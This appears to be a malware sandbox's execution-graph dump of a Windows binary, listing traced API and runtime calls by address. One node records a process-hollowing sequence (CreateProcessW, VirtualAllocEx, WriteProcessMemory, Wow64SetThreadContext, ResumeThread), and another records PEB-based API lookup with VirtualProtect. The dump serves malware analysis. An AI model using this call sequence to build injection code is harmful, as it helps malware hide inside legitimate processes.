                                                                                      execution_graph 21230 2afa40 21233 2afae0 21230->21233 21236 2afb00 21233->21236 21239 2a8e20 21236->21239 21238 2afa57 21240 2a8e34 Concurrency::details::_ContextCallback::_CallInContext 21239->21240 21241 2a8e3c Concurrency::details::_ContextCallback::_CallInContext 21240->21241 21243 2b368d RaiseException Concurrency::cancel_current_task 21240->21243 21241->21238 21244 2aee40 21245 2aee80 21244->21245 21250 2af170 21245->21250 21247 2aee87 std::_Throw_Cpp_error 21249 2aee8f 21247->21249 21257 2af230 21247->21257 21262 2ab420 21250->21262 21252 2af197 21265 2ab550 21252->21265 21256 2af1f1 21256->21247 21312 2af270 21257->21312 21260 2b2ab1 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 21261 2af260 21260->21261 21261->21249 21275 2a8520 21262->21275 21304 2a85d0 21265->21304 21268 2b2ab1 21269 2b2aba IsProcessorFeaturePresent 21268->21269 21270 2b2ab9 21268->21270 21272 2b5ff9 21269->21272 21270->21256 21311 2b60df SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 21272->21311 21274 2b60dc 21274->21256 21276 2a8534 std::_Throw_Cpp_error 21275->21276 21283 2b5cb1 21276->21283 21280 2a856d 21280->21252 21281 2a8551 21281->21280 21287 2b3501 39 API calls 2 library calls 21281->21287 21288 2b5ce1 GetCurrentThreadId 21283->21288 21286 2b3501 39 API calls 2 library calls 21289 2b5d0b 21288->21289 21290 2b5d2a 21288->21290 21291 2b5d10 AcquireSRWLockExclusive 21289->21291 21299 2b5d20 21289->21299 21292 2b5d4a 21290->21292 21293 2b5d33 21290->21293 21291->21299 21295 2b5da9 21292->21295 21301 2b5d62 21292->21301 21294 2b5d3e AcquireSRWLockExclusive 21293->21294 21293->21299 21294->21299 21297 2b5db0 TryAcquireSRWLockExclusive 21295->21297 21295->21299 21296 2b2ab1 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 21298 2a853c 21296->21298 21297->21299 21298->21281 21298->21286 21299->21296 21301->21299 21302 2b5d99 TryAcquireSRWLockExclusive 21301->21302 21303 2b698d GetSystemTimePreciseAsFileTime GetSystemTimeAsFileTime __aulldiv __aullrem __Xtime_get_ticks 21301->21303 21302->21299 21302->21301 21303->21301 21305 2a85e1 std::_Throw_Cpp_error 21304->21305 21308 2b5cc2 21305->21308 21309 2b5ccf ReleaseSRWLockExclusive 21308->21309 21310 2a85e9 21308->21310 21309->21310 21310->21268 21311->21274 21313 2af291 21312->21313 21322 2af4c0 21313->21322 21315 2af2d1 21325 2af3d0 21315->21325 21317 2af2e1 21329 2af310 75 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 21317->21329 21319 2af2f7 21320 2b2ab1 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 21319->21320 21321 2af253 21320->21321 21321->21260 21330 2af720 21322->21330 21324 2af510 21324->21315 21326 2af413 21325->21326 21343 2af650 21326->21343 21328 2af445 21328->21317 21329->21319 21331 2af775 21330->21331 21334 2af7e0 21331->21334 21333 2af78e 21333->21324 21335 2af820 21334->21335 21338 2af880 21335->21338 21337 2af836 21337->21333 21339 2af89d 21338->21339 21341 2af8a5 Concurrency::details::_ContextCallback::_CallInContext 21339->21341 21342 2af8d0 30 API calls std::_Throw_Cpp_error 21339->21342 21341->21337 21342->21341 21344 2af664 Concurrency::details::_ContextCallback::_CallInContext 21343->21344 21346 2af66c Concurrency::details::_ContextCallback::_CallInContext 21344->21346 21347 2b368d RaiseException Concurrency::cancel_current_task 21344->21347 21346->21328 21348 2ac280 21353 2a3fe0 21348->21353 21350 2ac2c4 std::_Throw_Cpp_error 21357 2ac370 CloseThreadpoolWork std::_Throw_Cpp_error 21350->21357 21352 2ac30d 21354 2a4010 21353->21354 21355 2b2ab1 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 21354->21355 21356 2a401d 21355->21356 21356->21350 21357->21352 21358 2a7fc0 21361 2a8130 21358->21361 21364 2a8140 21361->21364 21367 2a8160 21364->21367 21368 2a8187 21367->21368 21369 2b2ab1 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 21368->21369 21370 2a7fd7 21369->21370 21371 2a1fc0 GetModuleHandleA GetModuleFileNameW 21378 2c0c1a 21371->21378 21373 2a2031 21382 2a1d60 21373->21382 21376 2b2ab1 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 21377 2a2049 21376->21377 21379 2c0c2d _Fputc 21378->21379 21399 2c0c8f 21379->21399 21381 2c0c3f _Fputc 21381->21373 21430 2a1ba0 GetPEB 21382->21430 21384 2a1d81 GetProcAddress 21385 2a1dbe CreateFileA 21384->21385 21386 2a1e18 GetFileSize 21385->21386 21391 2a1e0f 21385->21391 21387 2a1e3e CloseHandle 21386->21387 21388 2a1e56 21386->21388 21387->21391 21390 2a1e61 ReadFile 21388->21390 21389 2a1ef2 21394 2b2ab1 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 21389->21394 21392 2a1ea1 21390->21392 21393 2a1ed5 CloseHandle 21390->21393 21391->21389 21431 2a1c10 21391->21431 21397 2a1ebd CloseHandle 21392->21397 21398 2a1eb2 21392->21398 21393->21391 21395 2a1fb4 21394->21395 21395->21376 21397->21391 21398->21397 21400 2c0cbf 21399->21400 21401 2c0cec 21400->21401 21402 2c0cce 21400->21402 21413 2c0cc3 21400->21413 21404 2c0cf9 21401->21404 21424 2ba140 48 API calls _Fputc 21401->21424 21423 2be728 29 API calls 2 library calls 21402->21423 21407 2c0d31 21404->21407 21408 2c0d13 21404->21408 21405 2b2ab1 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 21409 2c0f34 21405->21409 21411 2c0d45 21407->21411 21412 2c0ec1 21407->21412 21425 2ccf2b 5 API calls 3 library calls 21408->21425 21409->21381 21411->21413 21415 2c0ddf 21411->21415 21419 2c0d89 21411->21419 21412->21413 21429 2c23a1 WideCharToMultiByte _Fputc 21412->21429 21413->21405 21427 2c23a1 WideCharToMultiByte _Fputc 21415->21427 21417 2c0df2 21417->21413 21420 2c0e0b GetLastError 21417->21420 21426 2c23a1 WideCharToMultiByte _Fputc 21419->21426 21420->21413 21421 2c0e1a 21420->21421 21421->21413 21428 2c23a1 WideCharToMultiByte _Fputc 21421->21428 21423->21413 21424->21404 21425->21413 21426->21413 21427->21417 21428->21421 21429->21413 21430->21384 21443 2a1000 21431->21443 21434 2a1000 114 API calls 21435 2a1cbb GetProcAddress 21434->21435 21436 2a1ce4 VirtualProtect 21435->21436 21438 2a1d3c 21436->21438 21439 2a1d31 21436->21439 21441 2b2ab1 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 21438->21441 21454 2a1bd0 5 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 21439->21454 21442 2a1d4b 21441->21442 21442->21389 21444 2a1056 21443->21444 21455 2a1440 21444->21455 21446 2a13c7 21481 2a1b80 21446->21481 21452 2a1167 _Yarn 21452->21446 21459 2a1490 21452->21459 21462 2a14c0 21452->21462 21472 2a1af0 21452->21472 21478 2bf60b 21452->21478 21454->21438 21456 2a1466 std::_Throw_Cpp_error 21455->21456 21457 2b2ab1 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 21456->21457 21458 2a1487 21457->21458 21458->21452 21484 2a27d0 21459->21484 21461 2a14aa 21461->21452 21464 2a1510 _strlen 21462->21464 21562 2a3450 21464->21562 21465 2a15b1 21471 2a15c4 std::ios_base::_Ios_base_dtor 21465->21471 21566 2a3580 21465->21566 21470 2a18ef 21470->21452 21583 2a39b0 21471->21583 21473 2a1b20 _Fputc 21472->21473 21641 2a23e0 21473->21641 21476 2b2ab1 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 21477 2a1b4e 21476->21477 21477->21452 21479 2c2257 ___free_lconv_mon 14 API calls 21478->21479 21480 2bf623 21479->21480 21480->21452 21743 2a25f0 21481->21743 21485 2a2818 21484->21485 21487 2a27ff 21484->21487 21488 2a28b0 21485->21488 21487->21461 21489 2a28f3 std::_Throw_Cpp_error 21488->21489 21507 2a2b60 21489->21507 21492 2a294a 21511 2a2be0 21492->21511 21497 2a2979 std::_Throw_Cpp_error 21498 2a2a13 21497->21498 21499 2a29e0 21497->21499 21524 2a2cb0 5 API calls 2 library calls 21498->21524 21523 2a2cb0 5 API calls 2 library calls 21499->21523 21502 2a2a3a 21525 2a2cb0 5 API calls 2 library calls 21502->21525 21505 2a2a09 21518 2a2d40 21505->21518 21508 2a2b7b std::_Throw_Cpp_error 21507->21508 21509 2b2ab1 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 21508->21509 21510 2a2938 21509->21510 21510->21492 21522 2a2bc0 30 API calls std::_Throw_Cpp_error 21510->21522 21512 2a2bf7 21511->21512 21513 2a2b60 5 API calls 21512->21513 21514 2a2961 21513->21514 21515 2a2c60 21514->21515 21526 2a2eb0 21515->21526 21519 2a2d5d std::_Throw_Cpp_error 21518->21519 21521 2a2a91 21519->21521 21554 2a26e0 21519->21554 21521->21487 21523->21505 21524->21502 21525->21505 21531 2a2f40 21526->21531 21532 2a2f61 21531->21532 21533 2a2ec7 21531->21533 21542 2a3010 RaiseException Concurrency::cancel_current_task std::ios_base::_Init 21532->21542 21535 2a2ee0 21533->21535 21536 2a2eff 21535->21536 21537 2a2c7a 21535->21537 21538 2a2f1f 21536->21538 21539 2a2f0c 21536->21539 21537->21497 21551 2a2ff0 21538->21551 21543 2a2f80 21539->21543 21544 2a2f9e 21543->21544 21545 2a2fa3 21543->21545 21546 2a3010 std::_Throw_Cpp_error RaiseException 21544->21546 21547 2a2ff0 std::_Throw_Cpp_error RaiseException EnterCriticalSection LeaveCriticalSection 21545->21547 21546->21545 21548 2a2fae 21547->21548 21549 2a2fbb 21548->21549 21550 2be58f std::_Throw_Cpp_error 29 API calls 21548->21550 21549->21537 21550->21549 21552 2b2a33 std::ios_base::_Init RaiseException EnterCriticalSection LeaveCriticalSection 21551->21552 21553 2a3002 21552->21553 21553->21537 21557 2a2710 21554->21557 21556 2a2704 21556->21521 21558 2a273b shared_ptr 21557->21558 21559 2a2729 21557->21559 21558->21556 21561 2a2760 29 API calls std::_Throw_Cpp_error 21559->21561 21561->21558 21564 2a3499 21562->21564 21563 2a34b1 21563->21465 21564->21563 21591 2a3ae0 39 API calls 21564->21591 21592 2b2dc4 21566->21592 21570 2a35d7 21582 2a3615 21570->21582 21613 2a3e80 76 API calls std::ios_base::_Init 21570->21613 21572 2a36da 21572->21471 21574 2a3632 21575 2a364b 21574->21575 21614 2a3fb0 RaiseException Concurrency::cancel_current_task 21574->21614 21577 2a3fe0 5 API calls 21575->21577 21578 2a3665 21577->21578 21615 2b2ec3 RaiseException _Yarn Concurrency::cancel_current_task 21578->21615 21580 2a367b 21616 2a4030 5 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 21580->21616 21606 2b2df5 21582->21606 21584 2a39d5 21583->21584 21621 2a51a0 21584->21621 21587 2a3a00 21588 2a3a14 21587->21588 21589 2a3a2f 21588->21589 21640 2a6d00 39 API calls 21588->21640 21589->21470 21591->21563 21593 2b2dd3 21592->21593 21595 2b2dda 21592->21595 21617 2be8bf 6 API calls std::_Lockit::_Lockit 21593->21617 21596 2a35c2 21595->21596 21618 2b6688 EnterCriticalSection 21595->21618 21598 2a3d50 21596->21598 21599 2a3dae 21598->21599 21600 2a3d72 21598->21600 21602 2b2ab1 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 21599->21602 21601 2b2dc4 std::_Lockit::_Lockit 7 API calls 21600->21601 21603 2a3d83 21601->21603 21604 2a3dc0 21602->21604 21605 2b2df5 std::_Lockit::~_Lockit 2 API calls 21603->21605 21604->21570 21605->21599 21607 2b2dff 21606->21607 21608 2be8cd 21606->21608 21612 2b2e12 21607->21612 21619 2b6696 LeaveCriticalSection 21607->21619 21620 2be8a8 LeaveCriticalSection 21608->21620 21611 2be8d4 21611->21572 21612->21572 21613->21574 21615->21580 21616->21582 21617->21596 21618->21596 21619->21612 21620->21611 21624 2a51f0 21621->21624 21625 2a52dc 21624->21625 21626 2a5234 21624->21626 21627 2b2ab1 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 21625->21627 21630 2a5254 21626->21630 21636 2b6ffc RaiseException 21626->21636 21628 2a18d9 21627->21628 21628->21587 21637 2a52f0 38 API calls std::ios_base::_Init 21630->21637 21632 2a52af 21638 2a5330 30 API calls 2 library calls 21632->21638 21634 2a52c4 21639 2b6ffc RaiseException 21634->21639 21636->21630 21637->21632 21638->21634 21639->21625 21640->21589 21642 2a2409 21641->21642 21645 2b9f08 21642->21645 21644 2a1b3b 21644->21476 21646 2b9f1c _Fputc 21645->21646 21647 2b9f3e 21646->21647 21649 2b9f65 21646->21649 21660 2be728 29 API calls 2 library calls 21647->21660 21652 2bb6bd 21649->21652 21651 2b9f59 _Fputc 21651->21644 21653 2bb6c9 ___scrt_is_nonwritable_in_current_image 21652->21653 21661 2b9cbf EnterCriticalSection 21653->21661 21655 2bb6d7 21662 2bb092 21655->21662 21659 2bb6f5 21659->21651 21660->21651 21661->21655 21674 2c496b 21662->21674 21664 2bb0b9 21681 2ba4e1 21664->21681 21671 2b2ab1 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 21672 2bb12c 21671->21672 21673 2bb70c LeaveCriticalSection _Ungetc 21672->21673 21673->21659 21704 2c4a16 21674->21704 21676 2c497c _Fputc 21677 2c49de 21676->21677 21711 2c2291 21676->21711 21677->21664 21724 2ba443 21681->21724 21684 2ba507 21730 2be728 29 API calls 2 library calls 21684->21730 21686 2ba524 21697 2ba211 21686->21697 21691 2ba3a2 75 API calls 21692 2ba52f std::_Locinfo::_Locinfo_dtor 21691->21692 21692->21686 21692->21691 21693 2ba723 21692->21693 21731 2ba140 48 API calls _Fputc 21692->21731 21732 2ba791 29 API calls 21692->21732 21733 2ba809 79 API calls 2 library calls 21692->21733 21734 2ba962 79 API calls 2 library calls 21692->21734 21735 2be728 29 API calls 2 library calls 21693->21735 21695 2ba73d 21736 2be728 29 API calls 2 library calls 21695->21736 21698 2c2257 ___free_lconv_mon 14 API calls 21697->21698 21699 2ba221 21698->21699 21700 2c4a54 21699->21700 21701 2c4a5f 21700->21701 21702 2bb11a 21700->21702 21701->21702 21737 2bed68 21701->21737 21702->21671 21705 2c4a22 _Fputc 21704->21705 21706 2c4a4c 21705->21706 21707 2c59e4 _Ungetc 29 API calls 21705->21707 21706->21676 21708 2c4a3d 21707->21708 21709 2cdc7f _Fputc 29 API calls 21708->21709 21710 2c4a43 21709->21710 21710->21676 21712 2c22cf 21711->21712 21717 2c229f __Getctype 21711->21717 21713 2bde94 __dosmaperr 14 API calls 21712->21713 21715 2c22cd 21713->21715 21714 2c22ba RtlAllocateHeap 21714->21715 21714->21717 21718 2c2257 21715->21718 21716 2bc02b std::ios_base::_Init EnterCriticalSection LeaveCriticalSection 21716->21717 21717->21712 21717->21714 21717->21716 21719 2c228c 21718->21719 21720 2c2262 RtlFreeHeap 21718->21720 21719->21677 21720->21719 21721 2c2277 GetLastError 21720->21721 21722 2c2284 __dosmaperr 21721->21722 21723 2bde94 __dosmaperr 12 API calls 21722->21723 21723->21719 21725 2ba44e 21724->21725 21726 2ba470 21724->21726 21727 2be728 _Fputc 29 API calls 21725->21727 21728 2b9fac 29 API calls 21726->21728 21729 2ba469 21727->21729 21728->21729 21729->21684 21729->21686 21729->21692 21730->21686 21731->21692 21732->21692 21733->21692 21734->21692 21735->21695 21736->21686 21738 2beda8 21737->21738 21739 2bed81 21737->21739 21738->21702 21739->21738 21740 2c59e4 _Ungetc 29 API calls 21739->21740 21741 2bed9d 21740->21741 21742 2ca0b0 _Fputc 73 API calls 21741->21742 21742->21738 21744 2a2604 std::_Throw_Cpp_error 21743->21744 21745 2a26e0 29 API calls 21744->21745 21746 2a13d2 21744->21746 21745->21746 21746->21434 21747 2c3be1 21748 2c3bfc ___scrt_is_nonwritable_in_current_image 21747->21748 21759 2be891 EnterCriticalSection 21748->21759 21750 2c3c03 21760 2c9a6a 30 API calls 4 library calls 21750->21760 21752 2c3c21 21767 2c3c47 LeaveCriticalSection std::_Lockit::~_Lockit 21752->21767 21753 2c3c12 21753->21752 21761 2c3c7c 32 API calls 21753->21761 21756 2c3c32 21757 2c3c1c 21762 2c3d32 21757->21762 21759->21750 21760->21753 21761->21757 21763 2c3d39 21762->21763 21764 2c3d7c GetStdHandle 21763->21764 21765 2c3dde 21763->21765 21766 2c3d8f GetFileType 21763->21766 21764->21763 21765->21752 21766->21763 21767->21756 21768 2e519e 21769 2e51d4 21768->21769 21770 2e5321 GetPEB 21769->21770 21771 2e5333 CreateProcessW VirtualAlloc Wow64GetThreadContext ReadProcessMemory VirtualAllocEx 21769->21771 21770->21771 21771->21769 21772 2e53da WriteProcessMemory 21771->21772 21773 2e541f 21772->21773 21774 2e5424 WriteProcessMemory 21773->21774 21775 2e5461 WriteProcessMemory Wow64SetThreadContext ResumeThread 21773->21775 21774->21773 21776 2b6cf2 21777 2b6cfe ___scrt_is_nonwritable_in_current_image 21776->21777 21802 2b2c9a 21777->21802 21779 2b6d05 21780 2b6e5e 21779->21780 21788 2b6d2f ___scrt_is_nonwritable_in_current_image __CreateFrameInfo ___scrt_release_startup_lock 21779->21788 21825 2b649f 4 API calls 2 library calls 21780->21825 21782 2b6e65 21826 2bbcf9 21 API calls __CreateFrameInfo 21782->21826 21784 2b6e6b 21827 2bbd0f 21 API calls __CreateFrameInfo 21784->21827 21786 2b6e73 21787 2b6d4e 21788->21787 21789 2b6dcf 21788->21789 21821 2bbd43 48 API calls 4 library calls 21788->21821 21810 2be26c 21789->21810 21792 2b6dd5 21814 2a21c0 21792->21814 21794 2b6dec 21822 2b644c GetModuleHandleW 21794->21822 21796 2b6df6 21796->21782 21797 2b6dfa 21796->21797 21798 2b6e03 21797->21798 21823 2bbd25 21 API calls __CreateFrameInfo 21797->21823 21824 2b2cd3 79 API calls ___scrt_uninitialize_crt 21798->21824 21801 2b6e0c 21801->21787 21803 2b2ca3 21802->21803 21828 2b6107 IsProcessorFeaturePresent 21803->21828 21805 2b2caf 21829 2b76b8 10 API calls 2 library calls 21805->21829 21807 2b2cb4 21808 2b2cb8 21807->21808 21830 2b76d7 7 API calls 2 library calls 21807->21830 21808->21779 21811 2be27a 21810->21811 21812 2be275 21810->21812 21811->21792 21831 2be395 68 API calls 21812->21831 21832 2a22e0 21814->21832 21818 2a2268 FreeConsole EqualSid 21820 2a229c 21818->21820 21820->21794 21821->21789 21822->21796 21823->21798 21824->21801 21825->21782 21826->21784 21827->21786 21828->21805 21829->21807 21830->21808 21831->21811 21833 2a230c 21832->21833 21841 2b0530 21833->21841 21835 2a2259 21836 2a2330 21835->21836 21895 2b1a80 21836->21895 21840 2a2386 21840->21818 21848 2a73c0 21841->21848 21845 2b0595 21864 2a7450 21845->21864 21847 2b05b8 21847->21835 21870 2b0320 21848->21870 21851 2b2ab1 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 21852 2a73fa 21851->21852 21853 2b0620 21852->21853 21854 2b06b4 21853->21854 21855 2b0664 21853->21855 21857 2b2a33 std::ios_base::_Init 3 API calls 21854->21857 21855->21854 21856 2b0675 21855->21856 21877 2b2a33 21856->21877 21858 2b06c6 21857->21858 21889 2b0790 76 API calls 21858->21889 21863 2b06a1 21863->21845 21865 2a7464 21864->21865 21866 2a7478 21865->21866 21893 2a85f0 39 API calls Concurrency::cancel_current_task 21865->21893 21868 2a7491 21866->21868 21894 2a85f0 39 API calls Concurrency::cancel_current_task 21866->21894 21868->21847 21873 2b03b0 21870->21873 21874 2b03d9 21873->21874 21875 2b2ab1 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 21874->21875 21876 2a73ed 21875->21876 21876->21851 21878 2b2a38 _Yarn 21877->21878 21879 2b0687 21878->21879 21881 2b2a54 21878->21881 21890 2bc02b EnterCriticalSection LeaveCriticalSection std::ios_base::_Init 21878->21890 21888 2b0750 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 21879->21888 21882 2b2a5e Concurrency::cancel_current_task 21881->21882 21883 2b5eea std::ios_base::_Init 21881->21883 21891 2b6ffc RaiseException 21882->21891 21892 2b6ffc RaiseException 21883->21892 21885 2b5f06 21887 2b35b7 21888->21863 21889->21863 21890->21878 21891->21887 21892->21885 21902 2b1b20 21895->21902 21898 2b1ac0 21899 2b1ad4 21898->21899 21901 2b1ae8 21899->21901 21906 2a85f0 39 API calls Concurrency::cancel_current_task 21899->21906 21901->21840 21903 2b1b5e 21902->21903 21904 2b2ab1 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 21903->21904 21905 2a2374 21904->21905 21905->21898 21907 2afc10 21910 2afc50 21907->21910 21913 2afc60 21910->21913 21916 2a8a80 21913->21916 21917 2a8e20 Concurrency::details::_ContextCallback::_CallInContext RaiseException 21916->21917 21918 2a8ac7 21917->21918 21921 2a8e80 47 API calls 21918->21921 21920 2a8aec 21921->21920 21922 2acc70 21925 2ade10 21922->21925 21926 2ade3a 21925->21926 21930 2ade4a std::bad_exception::bad_exception 21925->21930 21933 2adf00 21926->21933 21928 2b2ab1 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 21929 2accca 21928->21929 21932 2ade45 21930->21932 21936 2abee0 36 API calls std::ios_base::_Init 21930->21936 21932->21928 21934 2a3fe0 5 API calls 21933->21934 21935 2adf44 std::_Throw_Cpp_error 21934->21935 21935->21932 21936->21932 21937 2a19d0 21944 2a6fd0 21937->21944 21939 2a19f8 21948 2a6e20 21939->21948 21943 2a1a14 21945 2a7017 21944->21945 21946 2a3580 76 API calls 21945->21946 21947 2a702d std::ios_base::_Ios_base_dtor 21946->21947 21947->21939 21949 2a3450 39 API calls 21948->21949 21954 2a6e6e 21949->21954 21950 2a39b0 39 API calls 21951 2a6f36 21950->21951 21952 2a3a00 39 API calls 21951->21952 21953 2a1a09 21952->21953 21955 2a3ae0 39 API calls 21953->21955 21954->21950 21955->21943 21956 2b4c50 21960 2b4c7e 21956->21960 21964 2b4c77 21956->21964 21957 2b2ab1 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 21958 2b4d7c 21957->21958 21961 2b4d30 21960->21961 21962 2b4cc9 21960->21962 21960->21964 21961->21964 21968 2bf661 78 API calls _Fputc 21961->21968 21962->21964 21965 2b4764 21962->21965 21964->21957 21969 2bf3d9 21965->21969 21967 2b4772 21967->21964 21968->21964 21970 2bf3ec _Fputc 21969->21970 21973 2bf57b 21970->21973 21972 2bf3fb _Fputc 21972->21967 21974 2bf587 ___scrt_is_nonwritable_in_current_image 21973->21974 21975 2bf58e 21974->21975 21976 2bf5b3 21974->21976 22014 2be728 29 API calls 2 library calls 21975->22014 21984 2b9cbf EnterCriticalSection 21976->21984 21979 2bf5a9 21979->21972 21980 2bf5c2 21985 2bf40f 21980->21985 21984->21980 21986 2bf446 21985->21986 21987 2bf434 21985->21987 22016 2c59e4 21986->22016 22038 2bf547 75 API calls _Fputc 21987->22038 21990 2bf43e 21992 2b2ab1 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 21990->21992 21991 2bf44d 21993 2c59e4 _Ungetc 29 API calls 21991->21993 21997 2bf475 21991->21997 21995 2bf545 21992->21995 21994 2bf45e 21993->21994 21994->21997 21999 2c59e4 _Ungetc 29 API calls 21994->21999 22015 2bf603 LeaveCriticalSection _Ungetc 21995->22015 21996 2bf52b 22039 2bf547 75 API calls _Fputc 21996->22039 21997->21996 22000 2c59e4 _Ungetc 29 API calls 21997->22000 22001 2bf46a 21999->22001 22002 2bf4a8 22000->22002 22003 2c59e4 _Ungetc 29 API calls 22001->22003 22004 2bf4cb 22002->22004 22006 2c59e4 _Ungetc 29 API calls 22002->22006 22003->21997 22004->21996 22005 2bf4e3 22004->22005 22023 2c5710 22005->22023 22008 2bf4b4 22006->22008 22008->22004 22009 2c59e4 _Ungetc 29 API calls 22008->22009 22010 2bf4c0 22009->22010 22011 2c59e4 _Ungetc 29 API calls 22010->22011 22011->22004 22013 2bf4f5 22013->21990 22033 2bf3ac 22013->22033 22014->21979 22015->21979 22017 2c5a05 22016->22017 22018 2c59f0 22016->22018 22017->21991 22040 2bde94 14 API calls __dosmaperr 22018->22040 22020 2c59f5 22041 2be57f 29 API calls __strnicoll 22020->22041 22022 2c5a00 22022->21991 22025 2c5725 22023->22025 22024 2c5766 22027 2c5729 _Fputc std::bad_exception::bad_exception 22024->22027 22029 2c5752 std::bad_exception::bad_exception 22024->22029 22043 2c23a1 WideCharToMultiByte _Fputc 22024->22043 22025->22024 22025->22027 22025->22029 22042 2ba140 48 API calls _Fputc 22025->22042 22027->22013 22029->22027 22044 2be728 29 API calls 2 library calls 22029->22044 22031 2c5821 22031->22027 22032 2c5837 GetLastError 22031->22032 22032->22027 22032->22029 22034 2bf3cb 22033->22034 22035 2bf3ba 22033->22035 22034->22013 22045 2cacd7 22035->22045 22037 2bf3c6 22037->22013 22038->21990 22039->21990 22040->22020 22041->22022 22042->22024 22043->22031 22044->22027 22046 2cad72 22045->22046 22047 2c59e4 _Ungetc 29 API calls 22046->22047 22049 2cad7f 22047->22049 22048 2cad8b 22048->22037 22049->22048 22050 2cadd7 22049->22050 22069 2caced 31 API calls _Fputc 22049->22069 22050->22048 22051 2cae39 22050->22051 22053 2c4a16 _Fputc 29 API calls 22050->22053 22058 2caf62 22051->22058 22055 2cae2c 22053->22055 22055->22051 22070 2ccecf 14 API calls 2 library calls 22055->22070 22059 2c59e4 _Ungetc 29 API calls 22058->22059 22060 2caf71 22059->22060 22061 2caf84 22060->22061 22062 2cb017 22060->22062 22064 2cafc8 22061->22064 22065 2cafa1 22061->22065 22071 2ca0b0 22062->22071 22066 2cae4a 22064->22066 22082 2c8bc2 33 API calls _Fputc 22064->22082 22067 2ca0b0 _Fputc 73 API calls 22065->22067 22066->22037 22067->22066 22069->22050 22070->22051 22072 2ca0bc ___scrt_is_nonwritable_in_current_image 22071->22072 22073 2ca0fd 22072->22073 22075 2ca143 22072->22075 22081 2ca0c4 22072->22081 22112 2be728 29 API calls 2 library calls 22073->22112 22083 2c9b08 EnterCriticalSection 22075->22083 22077 2ca149 22078 2ca167 22077->22078 22084 2c9e94 22077->22084 22113 2ca1b9 LeaveCriticalSection _Fputc 22078->22113 22081->22066 22082->22066 22083->22077 22085 2c9ebc 22084->22085 22106 2c9edf _Fputc 22084->22106 22086 2c9ec0 22085->22086 22088 2c9f1b 22085->22088 22128 2be728 29 API calls 2 library calls 22086->22128 22089 2c9f39 22088->22089 22129 2c8c42 31 API calls _Fputc 22088->22129 22114 2ca1c1 22089->22114 22093 2c9f98 22095 2c9fac 22093->22095 22096 2ca001 WriteFile 22093->22096 22094 2c9f51 22097 2c9f59 22094->22097 22098 2c9f80 22094->22098 22099 2c9fed 22095->22099 22100 2c9fb4 22095->22100 22101 2c9f93 22096->22101 22102 2ca023 GetLastError 22096->22102 22097->22106 22130 2ca605 6 API calls _Fputc 22097->22130 22131 2ca23e 54 API calls 4 library calls 22098->22131 22121 2ca66d 22099->22121 22104 2c9fd9 22100->22104 22105 2c9fb9 22100->22105 22101->22106 22102->22101 22133 2ca831 8 API calls 2 library calls 22104->22133 22105->22106 22109 2c9fc2 22105->22109 22106->22078 22132 2ca748 7 API calls 2 library calls 22109->22132 22112->22081 22113->22081 22115 2cdc7f _Fputc 29 API calls 22114->22115 22117 2ca1d3 22115->22117 22116 2c9f4b 22116->22093 22116->22094 22117->22116 22118 2ca201 22117->22118 22119 2ba140 _Fputc 48 API calls 22117->22119 22118->22116 22120 2ca21b GetConsoleMode 22118->22120 22119->22118 22120->22116 22126 2ca67c _Fputc 22121->22126 22122 2ca72d 22123 2b2ab1 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 22122->22123 22124 2ca746 22123->22124 22124->22106 22125 2ca6ec WriteFile 22125->22126 22127 2ca72f GetLastError 22125->22127 22126->22122 22126->22125 22127->22122 22128->22106 22129->22089 22130->22106 22131->22101 22132->22106 22133->22101 22134 2b3370 22155 2b32d7 GetModuleHandleExW 22134->22155 22137 2b33b6 22138 2b32d7 Concurrency::details::_Reschedule_chore GetModuleHandleExW 22137->22138 22140 2b33bc 22138->22140 22139 2a8520 46 API calls 22141 2b33aa 22139->22141 22142 2b33dd 22140->22142 22157 2b32ba GetModuleHandleExW 22140->22157 22143 2b5cc2 ReleaseSRWLockExclusive 22141->22143 22147 2b32d7 Concurrency::details::_Reschedule_chore GetModuleHandleExW 22142->22147 22143->22137 22145 2b33cd 22145->22142 22146 2b33d3 FreeLibraryWhenCallbackReturns 22145->22146 22146->22142 22148 2b33f3 22147->22148 22149 2a8520 46 API calls 22148->22149 22154 2b3421 22148->22154 22150 2b33ff 22149->22150 22151 2b5cc2 ReleaseSRWLockExclusive 22150->22151 22152 2b3412 22151->22152 22152->22154 22158 2b57fd WakeAllConditionVariable 22152->22158 22156 2b32ed 22155->22156 22156->22137 22156->22139 22157->22145 22158->22154

                                                                                      Control-flow Graph

                                                                                      APIs
